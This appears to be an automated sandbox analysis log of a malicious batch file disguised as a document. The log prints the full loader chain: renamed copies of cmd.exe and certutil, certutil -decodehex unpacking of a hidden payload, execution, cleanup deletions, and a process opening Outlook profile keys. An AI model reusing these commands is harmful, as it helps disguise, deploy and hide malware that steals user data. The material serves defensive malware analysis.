              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COMJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pifJump to behavior
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: url.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: winmm.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: wininet.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ??l.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: amsi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: sspicli.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: windows.storage.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: wldp.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: profapi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: kernel.appcore.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ieproxy.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: msasn1.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: mssip32.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: smartscreenps.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: mswsock.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: dnsapi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: iphlpapi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: winnsi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: rasadhlp.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: fwpuclnt.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: winhttpcom.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: webio.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: schannel.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: mskeyprotect.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ntasn1.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ncrypt.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ncryptsslp.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: cryptsp.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: rsaenh.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: cryptbase.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: gpapi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: dpapi.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Section loaded: ??????????.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Users\Public\Libraries\xzeheenC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: F.O Pump Istek,Docx.bat Static file information: File size 2966423 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: _.pdb source: xzeheenC.pif, 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1588311534.0000000029952000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1742091076.0000000030AE6000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030ADD000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1811611837.0000000020765000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
